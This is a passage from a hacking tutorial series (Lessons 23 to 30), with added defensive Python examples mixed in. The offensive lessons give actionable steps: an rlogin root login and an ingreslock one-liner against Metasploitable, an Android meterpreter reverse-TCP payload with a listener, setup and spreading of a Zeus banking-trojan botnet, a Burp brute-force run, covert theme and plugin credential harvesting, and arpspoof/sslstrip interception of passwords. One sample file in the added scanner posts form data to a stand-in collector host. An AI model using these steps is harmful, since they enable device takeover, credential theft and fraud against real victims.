Remember the list of open ports which you came across during the port scan? The 512, 513 and 514 ports are there for remotely accessing Unix machines. They have been misconfigured in such a way that anyone can set up a remote connection without proper authentication. This vulnerability is easy to exploit. We will use rlogin to remotely login to Metasploitable 2. Type rlogin to see the details about the command structure.
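Before moving on to the rlogin session, here is how a defender would triage that open-port list rather than exploit it. This is an added example for this page (not code from the tutorial, Rapid7 or nmap) in Python: it parses nmap's grepable output format (what nmap -oG - prints) and flags the ports this lesson calls out, 512 to 514 for the r-services, 21 for the vsftpd build the page describes as backdoored, 1524 for the ingreslock bind shell, plus telnet on 23 as another cleartext login. The scan lines are constructed to resemble a scan of the lab range, not a real scan, and the risky-port table is an assumption of this example.

```python
import re
from typing import Dict, List, Tuple

# Legacy/cleartext services worth flagging on any host. Assumption of this example,
# built from the services this lesson discusses plus telnet.
RISKY_PORTS = {
    21: "ftp (cleartext; the vsftpd on Metasploitable 2 is the backdoored build)",
    23: "telnet (cleartext login)",
    512: "exec (r-service, host-trust authentication instead of passwords)",
    513: "login (rlogin, host-trust authentication instead of passwords)",
    514: "shell (rsh, host-trust authentication instead of passwords)",
    1524: "ingreslock (bind shell reachable with a single telnet command)",
}

# Constructed nmap grepable (-oG) output for the lab range; field layout follows nmap's
# "Host: <ip> (<name>)\tPorts: <port>/<state>/<proto>/<owner>/<service>/<rpc>/<version>/, ..."
SAMPLE_GREPABLE = """\
# Nmap scan initiated as: nmap -sS -oG - 192.168.154.0/24
Host: 192.168.154.131 ()\tStatus: Up
Host: 192.168.154.131 ()\tPorts: 22/open/tcp//ssh///\tIgnored State: closed (999)
Host: 192.168.154.132 ()\tStatus: Up
Host: 192.168.154.132 ()\tPorts: 21/open/tcp//ftp///, 22/open/tcp//ssh///, 23/open/tcp//telnet///, 80/open/tcp//http///, 512/open/tcp//exec///, 513/open/tcp//login///, 514/open/tcp//shell///, 1524/open/tcp//ingreslock///\tIgnored State: closed (992)
# Nmap done
"""

# port / open / proto / owner (empty) / service /  -- only open ports match
PORT_RE = re.compile(r"(\d+)/open/(tcp|udp)//([^/,]*)/")


def parse_grepable(text: str) -> Dict[str, List[Tuple[int, str, str]]]:
    """Return {ip: [(port, proto, service), ...]} for every open port in -oG output."""
    hosts: Dict[str, List[Tuple[int, str, str]]] = {}
    for line in text.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue
        ip = line.split()[1]
        ports_field = line.split("Ports:", 1)[1].split("\t", 1)[0]   # stop before "Ignored State"
        for port, proto, svc in PORT_RE.findall(ports_field):
            hosts.setdefault(ip, []).append((int(port), proto, svc))
    return hosts


def triage(hosts: Dict[str, List[Tuple[int, str, str]]]) -> Dict[str, List[Tuple[int, str]]]:
    """Return {ip: [(port, reason), ...]} for hosts exposing any port in RISKY_PORTS."""
    findings = {}
    for ip, ports in hosts.items():
        flagged = [(p, RISKY_PORTS[p]) for p, proto, _ in ports if proto == "tcp" and p in RISKY_PORTS]
        if flagged:
            findings[ip] = flagged
    return findings


if __name__ == "__main__":
    for ip, items in triage(parse_grepable(SAMPLE_GREPABLE)).items():
        print(ip)
        for port, reason in items:
            print(f"  {port:5d}  {reason}")
```

Every flagged service is one that should be disabled or replaced by SSH on a real host: the r-services accept a connection on the strength of the client's hostname and a trust file rather than a password, which is exactly why the rlogin below hands out a root shell.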
root@kali:~# rlogin
usage: ssh [-1246AaCfgKkMNnqsTtVvXxYy] [-b bind_address] [-c cipher_spec]
           [-D [bind_address:]port] [-e escape_char] [-F configfile]
           [-I pkcs11] [-i identity_file]
           [-L [bind_address:]port:host:hostport]
           [-l login_name] [-m mac_spec] [-O ctl_cmd] [-o option] [-p port]
           [-R [bind_address:]port:host:hostport] [-S ctl_path]
           [-W host:port] [-w local_tun[:remote_tun]]
           [user@]hostname [command]

    rlogin -l root 192.168.154.132

Most probably you will get something like this:

root@kali:~# rlogin -l root 192.168.154.132
The authenticity of host '192.168.154.132 (192.168.154.132)' can't be established.
RSA key fingerprint is *****.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.154.132' (RSA) to the list of known hosts.
root@192.168.154.132's password:

As you can see, it is asking for a password. It's not because the target is not vulnerable. It's because we don't have the rsh-client installed on Kali Linux. The rsh-client is a remote login utility that will allow users to connect to remote machines.
    apt-get install rsh-client
This will start the installation process; you'll have to type yes once or twice, and Kali will do the rest for you. After the installation is successful, you should try your previous command again. This time around, things will be better.

root@kali:~# rlogin -l root 192.168.154.132
Last login: Thu May  1 11:34:55 EDT 2014 from :0.0 on pts/0
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
You have mail.
root@metasploitable:~#

Now you have an administrator privilege shell on Metasploitable 2. That was as easy as typing one line (and installing an application). We have one more such vulnerability that can be exploited easily.

Telnet Vulnerability

Look at the open port list again. On port 21, Metasploitable 2 runs VSFTPD, a popular FTP server. The version that is installed on Metasploitable contains a backdoor. The backdoor was quickly identified and removed, but not before quite a few people downloaded it. If a username is sent that ends in the sequence ":)" (the happy smiley), the backdoored version will open a listening shell on port 6200. This means anyone can login to a computer without knowing the credentials, just by using :). This can be exploited using Metasploit. We will cover this in the next tutorial. Till then, something for your appetite:
    telnet 192.168.99.131 1524
This is another one line exploit, on the 1524 ingreslock port (see portscan result).

Lesson 24: Hacking Android

Nowadays mobile users are increasing day by day, and the security threat is also increasing together with the growth of its users. Our tutorial for today is how to hack Android smartphones using Metasploit.

What is Android? According to Wikipedia: "Android is an operating system based on the Linux kernel, and designed primarily for touchscreen mobile devices such as smartphones and tablet computers. Initially developed by Android, Inc., which Google backed financially and later bought in 2005, Android was unveiled in 2007 along with the founding of the Open Handset Alliance: a consortium of hardware, software, and telecommunication companies devoted to advancing open standards for mobile devices."

And what is an APK? According to Wikipedia: "Android application package file (APK) is the file format used to distribute and install application software and middleware onto Google's Android operating system; very similar to an MSI package in Windows or a Deb package in Debian-based operating systems like Ubuntu."
Here is some initial information for this tutorial:

Attacker IP address: 192.168.8.94
Attacker port to receive the connection: 443

Requirements:
1. Metasploit framework (we use Kali Linux 1.0.6 in this tutorial)
2. Android smartphone (we use an HTC One running Android 4.4 KitKat)

Step by Step Hacking Android Smartphone Tutorial using Metasploit:

1. Open a terminal.
2. We will use the Metasploit payload framework to create the exploit for this tutorial:
msfpayload android/meterpreter/reverse_tcp LHOST=<attacker_ip_address> LPORT=<port_to_receive_connection>
As described above, the attacker IP address is 192.168.8.94; now execute the command.
3. Because our payload is reverse_tcp, where the attacker expects the victim to connect back to the attacker machine, the attacker needs to set up a handler for incoming connections on the port specified above. Type msfconsole to open the Metasploit console.
Info:
use exploit/multi/handler –> we will use the Metasploit handler
set payload android/meterpreter/reverse_tcp –> make sure the payload is the same as in step 2
4. Next we configure the options for the Metasploit payload we specified in step 3.
Info:
set lhost 192.168.8.94 –> attacker IP address
set lport 443 –> port to listen on for the reverse connection
exploit –> start listening for the incoming connection
5. The attacker already has the APK file and now starts distributing it (I don't need to describe how to distribute this file; the internet is a good place for distribution).
6. Short story: the victim (me, myself) downloads the malicious APK file and installs it. After the victim opens the application, the meterpreter session opens and the attack has begun.
7. This means the attacker is already inside the victim's Android smartphone and can do everything with the victim's phone.
Experiment with different commands at this point. For example, webcam_list gives you a list of the cameras on the victim's device, such as:
back camera
front camera
webcam_snap 2 would take a picture from one of the cameras. Sneaky sneaky.

Conclusion:
1. Don't install APKs from unknown sources.
2. If you really want to install an APK from an unknown source, make sure you can view, read and examine the source code.

Lesson 25: Remote Administration Tool (RAT)

Today we will learn how to set up the Remote Administration Tool Zeus BotNet (RAT). We chose Zeus because Zeus was one of the most famous trojan horses in history, infecting many servers around 2007-2010. If you don't know about Zeus, here is the definition from Wikipedia:

Zeus is a Trojan horse that steals banking information by Man-in-the-browser keystroke logging and Form Grabbing. Zeus is spread mainly through drive-by downloads and phishing schemes. First identified in July 2007 when it was used to steal information from the United States Department of Transportation, it became more widespread in March 2009. In June 2009, security company Prevx discovered that Zeus had compromised over 74,000 FTP accounts on websites of such companies as the Bank of America, NASA, Monster.com, ABC, Oracle, Play.com, Cisco, Amazon, and BusinessWeek. In late 2010, a number of Internet security vendors including McAfee and Internet Identity claimed that the creator of Zeus had said that he was retiring and had given the source code and rights to sell Zeus to his biggest competitor, the creator of the SpyEye trojan. However, those same experts warned the retirement was a ruse and expect the cracker to return with new tricks. As of 13 May 2011, the source code and compiled binaries are found to be hosted on GitHub.

Requirements:
1. Remote Administration Tool (RAT) Zeus BotNet
2. Web Server + Database Server (in this example we use XAMPP)

Remote Administration Tool (RAT) Zeus BotNet:

1. Firstly, we need to install the web server and database server. Since we're using XAMPP for this tutorial, you can refer to the previous step-by-step guide How to Install XAMPP in 7 Simple Steps to install XAMPP on a Windows machine; make sure your XAMPP Apache and MySQL services are started and running.
2. Open the internet browser and type http://localhost/phpmyadmin. Input the username and password; by default the username is root and the password is left empty. After that, create a new database. I named it bot, but you can change it to whatever you want. This database name will be used for the installation of the remote administration tool.
3. Next we need to download the remote administration tool file and extract it. You will find 3 main folders: builder, other, and server[php]. Create a new folder inside C:\xampp\htdocs. I give the folder the name bot, then copy the server[php] contents into C:\xampp\htdocs\bot.
4. Now go back to the web browser and type http://localhost/bot/install into the address bar. Fill in all required fields with the correct information.
Information:
– The host address for MySQL is your database server IP address. If you run XAMPP locally, it is your own IP address.
– Database is the name of the database created in step 2.
– Encryption key can be any characters with a length from 1 to 255.
Click Install to start installing.
Notes: If you get this error:
ERROR:Failed connect to MySQL server: Host 'myusername' is not allowed to connect to this MySQL server
you need to do the following:
a. Open phpMyAdmin at http://localhost/phpmyadmin and click the Privileges tab. Click the edit button to edit the root user privileges.
b. On the edit user page, scroll down to the login information section. Change the Host from localhost to Any host and press the Go button. (Note that this also allows the MySQL root account to connect from any host, so only do it on an isolated lab machine.)
6. The next step is configuring and creating the Zeus bot client. Open the builder folder and open the config.txt configuration file.
Change the url_config, url_loader and url_server settings according to your IP address. Note: don't forget to edit the path of webinjects.txt.
7. Now open the zsb.exe file. Click Builder, then click Browse. Click Build the bot configuration under the Actions header, then Build the bot executable.
8. After building the bot config and the bot executable in step 7, we have two new files, config.bin and bot.exe. Copy those two files into the htdocs folder. Mine was C:\xampp\htdocs\bot.
9. Now let's say we send the generated bot.exe to the victim. After the victim executes the file, we can check our attacker server. Open the browser, type http://localhost/bot/cp.php and enter your username and password.
10. We can see the newly infected victim in the web interface and even view a desktop screenshot of the victim.

Conclusion:
1. Once the victim is infected, the attacker can gather a lot of information from the victim, including all internet activity, and even harvest every website username and password, since this tool acts as a keylogger and captures login information.
2. To prevent an attack by this trojan, always update your operating system and antivirus, and do not click any link that looks suspicious in your mail or chat messenger.

Lesson 26: Hacking Basic HTTP Authentication using Burp Suite

Hacking HTTP basic authentication with dictionary attacks using Burp Suite Free is our tutorial for today; we will use a tool called Burp Suite. If you have only just heard about Burp Suite, here is the explanation from their website:

Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application's attack surface, through to finding and exploiting security vulnerabilities.
Burp gives you full control, letting you combine advanced manual techniques with state-of-the-art automation, to make your work faster, more effective, and more fun.

Explanation of HTTP basic authentication:

HTTP supports several authentication mechanisms. Upon a request for a resource within a protected space, the server should respond with an authentication challenge using the WWW-Authenticate header. In order to receive authorization, the client should send the requested identification information using the Authorization header. When the client is not authorised, a 401 "Unauthorised" response status is returned. The simplest and most common HTTP authentication in use is Basic. The client needs to provide the credentials as a Base64-encoded string username:password. If the credentials are correct, the web server returns the requested resource; otherwise the server repeats the authentication challenge.

Requirements:
1. Download Burp Suite at portswigger.net (in this tutorial I use the free edition) and install it.
2. Compose a basic PHP login script to use on the victim machine.

Hacking HTTP Basic Authentication Dictionary Attacks with Burp Suite Free:

1. The PHP script from requirement 2 is a simple login page. You can copy it to your HTDOCS folder if you use XAMPP or WAMP for your web development platform.
2. Run Burp Suite and change your browser proxy setting to go through Burp. By default Burp uses port 8080; if you don't know how to change the browser proxy settings, a simple Google search will tell you how.
3. With the proxy set up, we can now access the login.php file. In this example, for testing purposes, I will input username = test and password = test. When we click the submit button (LOG IN), Burp intercepts the data. Right-click and choose "Send to Intruder".
4. On the INTRUDER –> POSITIONS tab, change the attack type to "Cluster Bomb".
5. After setting the attack type, we can move to the PAYLOADS tab.
To fill in these PAYLOADS, see the picture from step 4.
Payload set 1 = PHPSESSID (the value). We set the same PHPSESSID value, because the system uses a static PHPSESSID.
6. Now we change payload set number two; we're still on the PAYLOADS tab.
Payload set 2 = username (the value). You can load the usernames from a username list; I input the usernames one by one.
7. For payload number three we input the password.
Payload set 3 = password (the value). Here you can also load from a password list, but in the example above I input the passwords one by one.
8. The last PAYLOADS to set up is the submit parameter.
Payload set 4 = submit (the value). Since this submit parameter only checks whether the user clicked the button or not, we can give it the same value, LOG+IN%21.
9. With every PAYLOADS set up successfully, we now start the attack and watch Burp Suite perform it automatically. Click Intruder and choose "Start Attack".
10. Burp Suite Intruder will check the usernames and passwords one by one. When there is a matching username and password, you can see that the response length has changed. From this example we know that the username = admin and password = 123456.

Conclusion:
1. To prevent this kind of attack, as a user you can do nothing; as a developer you can do what Gmail's anti-brute-force system does, where every attempt is logged by the system based on its IP address. If you try to log in and fail several times, the system forces the user to solve a CAPTCHA.
2. As a developer you can also add salt to the username and password to make the attack take much longer, but in my opinion the first conclusion is better.

Lesson 27: Hacking WordPress – Send Secret Emails from Malicious Layout Code About Site Info

Today's title is Hacking WordPress: Send Email Secretly About Website Information.

Requirements:
1. Understand PHP,
2. Know WordPress functions,
3. Script to send email secretly (ask for the script when ready).
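Before the WordPress walkthrough, an added example for Lesson 26 (it is not the lesson's PHP login script or Burp's code). It implements the server side of the HTTP Basic authentication described there, decoding the Authorization header's Base64 username:password and answering 401 with a WWW-Authenticate challenge, and applies the first conclusion: failures are counted per client IP, and after a threshold the client is refused and told to solve a CAPTCHA, so an Intruder-style dictionary run stalls after a handful of guesses. The user store, passwords, IP addresses and the request sequence are constructed; PBKDF2 stands in for whatever slow password hash a real deployment uses.

```python
"""Server-side HTTP Basic authentication with per-IP failure throttling.

Added example: decodes the Basic Authorization header and locks an IP
address behind a CAPTCHA after MAX_FAILURES bad attempts.
"""
import base64
import binascii
import hashlib
import hmac
from collections import defaultdict
from typing import Dict, List, Optional, Tuple

MAX_FAILURES = 5        # failures per IP before a CAPTCHA is demanded
PBKDF2_ROUNDS = 50_000  # slow hash; bcrypt/argon2 would be used in production


def hash_password(salt: bytes, password: str) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, PBKDF2_ROUNDS)


# Constructed user store: username -> (salt, password hash).
USERS: Dict[str, Tuple[bytes, bytes]] = {
    "admin": (b"constructed-salt", hash_password(b"constructed-salt", "correct horse battery")),
}
DUMMY_SALT = b"dummy-salt-for-unknown-users"


def basic_header(username: str, password: str) -> str:
    """Build the header a client sends: 'Basic ' + base64('user:pass')."""
    token = base64.b64encode(f"{username}:{password}".encode("utf-8")).decode("ascii")
    return f"Basic {token}"


def parse_basic_auth(header_value: str) -> Optional[Tuple[str, str]]:
    """Decode an Authorization header; None if it is not well-formed Basic."""
    scheme, _, token = header_value.strip().partition(" ")
    if scheme.lower() != "basic" or not token:
        return None
    try:
        raw = base64.b64decode(token, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    username, sep, password = raw.partition(":")
    if not sep:
        return None
    return username, password


class BasicAuthGate:
    """Decides a request's status the way a protected resource would."""

    CHALLENGE = {"WWW-Authenticate": 'Basic realm="protected"'}

    def __init__(self) -> None:
        self.failures: Dict[str, int] = defaultdict(int)

    def check(self, client_ip: str, header_value: Optional[str]) -> Tuple[int, Dict[str, str]]:
        if self.failures[client_ip] >= MAX_FAILURES:
            # Locked: even a correct guess is refused until a CAPTCHA is solved.
            return 429, {"X-Require-Captcha": "1"}
        if header_value is None:
            return 401, self.CHALLENGE
        creds = parse_basic_auth(header_value)
        if creds is None:
            self.failures[client_ip] += 1
            return 401, self.CHALLENGE
        username, password = creds
        record = USERS.get(username)
        if record is None:
            # Hash anyway so unknown users cost the same time as known ones.
            hash_password(DUMMY_SALT, password)
            ok = False
        else:
            salt, expected = record
            ok = hmac.compare_digest(hash_password(salt, password), expected)
        if not ok:
            self.failures[client_ip] += 1
            return 401, self.CHALLENGE
        self.failures[client_ip] = 0
        return 200, {}


def simulate() -> List[int]:
    """Constructed traffic: one legitimate login, then a dictionary run from another IP."""
    gate = BasicAuthGate()
    statuses = [
        gate.check("10.0.0.5", None)[0],
        gate.check("10.0.0.5", basic_header("admin", "correct horse battery"))[0],
    ]
    for guess in ["123456", "password", "admin", "letmein", "qwerty", "welcome"]:
        statuses.append(gate.check("10.0.0.9", basic_header("admin", guess))[0])
    # The right password no longer helps once the IP is throttled.
    statuses.append(gate.check("10.0.0.9", basic_header("admin", "correct horse battery"))[0])
    return statuses


if __name__ == "__main__":
    print(simulate())  # [401, 200, 401, 401, 401, 401, 401, 429, 429]
```

Two details matter for the Intruder workflow the lesson shows: the lock applies before the password is even checked, so the "length changed" signal for a correct guess never appears once the threshold is hit, and the response for an unknown username takes the same time as for a known one.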
Step by step Hacking WordPress: Send Email Secretly About Website Information:

1. We want to know the WordPress user information of a user. Let's see the following script:
2. The script from step one, if executed, shows the details of the active (logged-in) WordPress user. Execute this script on your local WordPress server; here is what I got:
Username: victim
Password: $P$BtwjqOL0j8USlI4htLLp0wnmizvaEB
User email: [email protected]
User first name:
User last name:
User display name: victim
User ID: 1
3. Even though we know the username and password hash, we still need time to crack the password hash to get the user's plain password. In our last WordPress hacking tutorial, WordPress hacking tutorials to add administrator user secretly, we added an administrator secretly by spreading malicious themes, but the problem is: "how do we know who has already downloaded the malicious WordPress theme?"
4. Given the problem in step three, we will combine this tutorial with WordPress hacking tutorials to add administrator user secretly and send the URL address of the infected website by inserting the following script.
5. When you see this email address, it is way too plain; what if we encode it using the base64_encode PHP function? Here is the result.
6. The script I provide will secretly send an email to the attacker containing the WordPress URL when the victim logs in and browses his/her WordPress website.

Conclusion:
1. Download WordPress themes only from trusted sources.
2. Buying is usually better than a "free download".
3. Usually you find this kind of attack in premium WordPress themes (nulled edition or warez); check the source code of the themes one by one to minimize the attack. You can try to find the strings below in your theme code (especially nulled and warez editions) to check whether it contains malicious code or not.
base64_encode (most attackers use base64 encoding)
http:// (check where the URL is going)

Lesson 28: Reveal Asterisk Saved Passwords

We will learn how to reveal the asterisks on Mozilla Firefox and Google Chrome without seeing the saved password from the browser options menu. If you have never heard about Firebug, here is the description from Wikipedia:

Firebug is a web development tool that facilitates the debugging, editing, and monitoring of any website's CSS, HTML, DOM, XHR, and JavaScript; it also provides other web development tools. Firebug's JavaScript panel can log errors, profile function calls, and enable the developer to run arbitrary JavaScript. Its net panel can monitor URLs that the browser requests, such as external CSS, JavaScript, and image files. The net panel can display both request headers and response headers for each page asset; it can also estimate the time each asset took to load.

Requirements:
1. Mozilla Firefox with the Firebug add-on.
2. Google Chrome.

Step by step to Reveal Asterisk Saved Passwords on Mozilla Firefox and Chrome:

1. Open the Mozilla Firefox browser, press ALT –> click Tools –> click Add-ons.
2. On the Add-ons page there is a search box; type firebug in the textbox and click search, or go directly to https://addons.mozilla.org/en-US/firefox/addon/firebug/. Click Install if a pop-up window asks you to install this add-on, and restart your browser.
3. This is the Firebug button. To activate Firebug you only need to click this button, and click it once again to deactivate.
4. Now open a website with a login page, e.g. mail.live.com, and input the password. Right-click on the password box and choose Inspect Element.
5. Double-click type="password" and change it to type="text".
6. The asterisk password is shown and revealed.
7. What if it is the Google Chrome browser? The steps are the same. Open the login page, right-click the password box and choose Inspect Element.
8. Change the input type="password" to type="text". The password is revealed.

Lesson 29: Hacking Internet Users' Passwords Using a 'Malicious' Firefox Plugin

The title Hacking Internet Users' Passwords Using a Malicious Firefox Plugin came about after some students asked about the possibility of gathering usernames and passwords through a browser plugin. The answer is yes: you can gather usernames and passwords from internet users once they have installed a malicious plugin. According to Wikipedia, a plugin is:

In computing, a plug-in (or plugin, extension) is a software component that adds a specific feature to an existing software application. When an application supports plug-ins, it enables customization. The common examples are the plug-ins used in web browsers to add new features such as search engines, virus scanners, or the ability to utilize a new file type such as a new video format.

In this Hacking Internet Users' Passwords Using a Malicious Firefox Plugin case, the attacker changes, adds, modifies or creates the main functions of a Firefox plugin and overrides or rewrites some functions to perform malicious activities for the attacker's benefit.

Requirements:
1. Malicious Firefox plugin
2. Understand JavaScript
3. Social engineering

How to Hack Internet Users' Passwords Using a Malicious Firefox Plugin:

The victim's browser, which has a malicious Firefox plugin installed, accesses the internet. As the victim browses the internet, the infected browser also sends data to the attacker's server. The data is which websites the victim visited, along with the username and password. The attacker's harvester website grabs every GET or POST request and stores it in a simple TXT file, but it could be changed to another database server as well.

Conclusion:
1. Make sure you download plugins only from a trusted source (e.g. http://addons.mozilla.org/).
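An added example, not from this course, that covers the string checks Lesson 27 recommends for theme code (base64 functions and http:// URLs) and the review a defender would give a browser plugin of the kind Lesson 29 describes: it walks a directory of PHP/JavaScript files, flags lines that match encoding, eval, mail, form-capture and remote-posting indicators, and reports file and line for manual review. The indicator list, the allow-listed hosts and the two sample files (one benign, one showing the warned-about pattern) are constructed; a match is a lead, not a verdict.

```python
"""Static indicator scan for third-party theme and browser-extension code.

Added example for Lessons 27 and 29: reports lines worth a manual look
(base64, eval, mail, form capture, posting to non-allow-listed hosts).
"""
import os
import re
import tempfile
from typing import List, NamedTuple


class Finding(NamedTuple):
    path: str
    line: int
    kind: str
    snippet: str


INDICATORS = [
    ("base64", re.compile(r"\bbase64_(?:en|de)code\s*\(|\b(?:atob|btoa)\s*\(")),
    ("eval", re.compile(r"\beval\s*\(|\bcreate_function\s*\(")),
    ("mail", re.compile(r"\b(?:wp_)?mail\s*\(")),
    ("form-capture", re.compile(r"\$_(?:GET|POST|REQUEST)\b|\bFormData\s*\(|addEventListener\s*\(\s*['\"]submit['\"]")),
    ("remote-post", re.compile(r"\bXMLHttpRequest\b|\bfetch\s*\(|\bcurl_init\s*\(|\bwp_remote_post\s*\(")),
]
URL = re.compile(r"https?://([^\s/'\"<>]+)", re.I)
# Assumption: hosts a legitimate theme or extension routinely references.
ALLOWED_HOSTS = {"wordpress.org", "www.w3.org", "schema.org", "addons.mozilla.org"}
SOURCE_EXT = {".php", ".js", ".html", ".json"}


def scan_text(text: str, path: str = "<inline>") -> List[Finding]:
    """One Finding per (line, indicator); remote-url once per line."""
    out: List[Finding] = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for kind, pattern in INDICATORS:
            if pattern.search(line):
                out.append(Finding(path, lineno, kind, line.strip()[:80]))
        for host in URL.findall(line):
            if host.lower() not in ALLOWED_HOSTS:
                out.append(Finding(path, lineno, "remote-url", line.strip()[:80]))
                break
    return out


def scan_tree(root: str) -> List[Finding]:
    """Scan every source file under root, paths reported relative to root."""
    out: List[Finding] = []
    for dirpath, _, files in os.walk(root):
        for name in sorted(files):
            if os.path.splitext(name)[1].lower() in SOURCE_EXT:
                full = os.path.join(dirpath, name)
                with open(full, encoding="utf-8", errors="replace") as fh:
                    out.extend(scan_text(fh.read(), os.path.relpath(full, root)))
    return out


# Constructed sample files.
BENIGN_PHP = """<?php
/* constructed header.php */
get_header();
?>
<a href="https://wordpress.org/">Powered by WordPress</a>
"""
SUSPICIOUS_PHP = """<?php
/* constructed functions.php showing the pattern Lesson 27 warns about */
$r = base64_decode('Y29uc3RydWN0ZWQ=');
mail($r, 'site', home_url());
"""
SUSPICIOUS_JS = """// constructed extension content script
document.addEventListener('submit', function (e) {
  fetch('http://collector.example/', {method: 'POST', body: new FormData(e.target)});
});
"""


def demo() -> List[Finding]:
    """Write the constructed files into a temporary 'theme' directory and scan it."""
    with tempfile.TemporaryDirectory() as root:
        for name, body in [("header.php", BENIGN_PHP), ("functions.php", SUSPICIOUS_PHP),
                           ("js/harvest.js", SUSPICIOUS_JS)]:
            full = os.path.join(root, name)
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "w", encoding="utf-8") as fh:
                fh.write(body)
        return scan_tree(root)


if __name__ == "__main__":
    for f in demo():
        print(f"{f.path}:{f.line} [{f.kind}] {f.snippet}")
```

Run scan_tree against an unpacked theme or an extension's extracted sources; anything reported under base64 or remote-url with a host you do not recognise is where the lesson's conclusion says to start reading.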
Lesson 30: Breaking SSL Encryption

Level: Medium, Advanced

Some people ask "Are you sure SSL (Secure Socket Layer) port 443 can be hacked and we can know the password sent over the network??" ... how do you break SSL protection using sslstrip?

What is SSL? Actually, if you look at my explanation about SSL in my previous post, when we try to break the encryption it's a little bit hard to break, but here in this tutorial I will explain how to break the SSL encryption without breaking the SSL encryption, using a Man in the Middle Attack :-).

Man in the Middle Attack Requirements:
1. KALI LINUX
2. Arpspoof
3. IPTables
4. SSLStrip
5. NetStat

SSLSTRIP may need to be downloaded and installed.

Perform the Attack – Man in the Middle Attack

1. Set up your Linux box so it can forward every incoming packet (enable IP forwarding).
echo '1' > /proc/sys/net/ipv4/ip_forward
This gives your BackTrack/Kali box the ability to forward every packet that was not intended for your machine.
2. Know your network gateway.
netstat -nr
For example, I already know that my gateway address is 192.168.8.8.
3. Use arpspoof to perform the Man in the Middle Attack.
arpspoof -i eth0 192.168.8.8
a. Change "eth0" to the network card currently connected to the network. Usually it is eth0 or wlan0.
b. Change "192.168.8.8" to your network's default gateway.
c. In this tutorial I use arpspoof on the entire network. Be careful if your network has a large user base connected to it, because it will crash your network and bring it down.

SSL Strip

Created by Moxie Marlinspike, who gave a demonstration of the HTTPS stripping attacks presented at Black Hat DC 2009. It will transparently hijack HTTP traffic on a network, watch for HTTPS links and redirects, then map those links into either look-alike HTTP links or homograph-similar HTTPS links. It also supports modes for supplying a favicon which looks like a lock icon, selective logging, and session denial.
- Taken from the author's website.

This all happens on the fly and is practically invisible to users. The only way to notice is by checking the URL in the address bar: where normally it would display HTTPS, it will now display HTTP instead.

Install SSL Strip (optional)
1. Download SSL Strip
2. tar zxvf sslstrip-0.9.tar.gz
3. cd sslstrip-0.9
4. python setup.py install

Break SSL Protection Using SSLStrip and Kali Linux

1. We need to set up a firewall rule (using iptables) to redirect requests from port 80 to port 8080, to ensure our outgoing connections (from SSL Strip) get routed to the proper port.
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080
2. After setting up iptables, the next step is to redirect all network HTTP traffic through our computer using arpspoof (don't forget to enable IP forwarding).
echo '1' > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 192.168.8.8
3. When everything is running well, you will see arpspoof capturing network traffic. Next, start SSL Strip by opening a new terminal (CTRL+ALT+T):
sslstrip -l 8080
"-l" tells the program to listen on the specified port. SSL Strip is now running and waiting for a victim to open an SSL URL such as https://mail.google.com, https://mail.yahoo.com, etc. As a victim I will try to open https://mail.live.com. When I open the page, I expect the URL to no longer be in Secure Sockets Layer: the URL changes to HTTP.
4. After SSL Strip has captured enough data, stop arpspoof and SSL Strip by hitting CTRL+C. After you stop it, the whole network will be down and cannot be accessed for a while (it shouldn't take long); this happens because arpspoof does not automatically repopulate the ARP tables with the router's proper MAC address.
5. Inside the SSL Strip folder there will be a new file, "sslstrip.log", that stores all the information captured over HTTP and even HTTPS.
Just take a look at the file using your favorite text editor. The picture below shows the content of my sslstrip.log, which captured the victim's data when they opened https://mail.live.com. You can see the plain username and password there in the log.

Prevention of SSL Strip Attack
1. If you are on a public network (internet cafe, unsecured hotspot, etc.), minimize logging in to your personal accounts.
2. Use SSH tunneling.
3. Keep your eyes open.

Remember This! Don't use this for anything other than educational purposes or on a server with permission from a client. Don't be shocked if this application gets you to jail faster if you use it for a purpose not intended by law.
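An added detection-side example for Lesson 30, not part of the course. The arpspoof step works by making the victim's ARP cache map the gateway IP to the attacker's MAC, and step 4 notes that the cache is left wrong afterwards. The script below parses `ip neigh show` output, compares the gateway's MAC against a pinned value recorded when the network was known-good, and flags the arpspoof signature: the MAC now answering for the gateway also belongs to an ordinary host. The gateway address, MACs and the two cache snapshots are constructed.

```python
"""Detect the gateway ARP poisoning that Lesson 30's arpspoof step performs.

Added example: compares `ip neigh show` snapshots against a pinned
gateway MAC and reports when another host's MAC answers for the gateway.
"""
import re
from typing import Dict, List

# Matches "192.168.8.8 dev eth0 lladdr 00:1a:2b:3c:4d:5e REACHABLE".
NEIGH_LINE = re.compile(
    r"^(\S+)\s+dev\s+(\S+)\s+lladdr\s+([0-9a-f]{2}(?::[0-9a-f]{2}){5})\b", re.I
)


def parse_neigh(output: str) -> Dict[str, str]:
    """IP -> MAC; entries without lladdr (FAILED, INCOMPLETE) are skipped."""
    table: Dict[str, str] = {}
    for line in output.splitlines():
        m = NEIGH_LINE.match(line.strip())
        if m:
            table[m.group(1)] = m.group(3).lower()
    return table


def arp_alerts(table: Dict[str, str], gateway_ip: str, pinned_mac: str) -> List[str]:
    """Alerts for a gateway MAC mismatch and for a MAC claiming gateway plus host."""
    alerts: List[str] = []
    pinned = pinned_mac.lower()
    gw_mac = table.get(gateway_ip)
    if gw_mac is None:
        return alerts
    if gw_mac != pinned:
        alerts.append(f"gateway {gateway_ip} resolves to {gw_mac}, pinned MAC is {pinned}")
    # arpspoof signature: the MAC answering for the gateway is also a normal host's MAC.
    others = sorted(ip for ip, mac in table.items() if mac == gw_mac and ip != gateway_ip)
    if others:
        alerts.append(f"{gw_mac} answers for the gateway and also for {', '.join(others)}")
    return alerts


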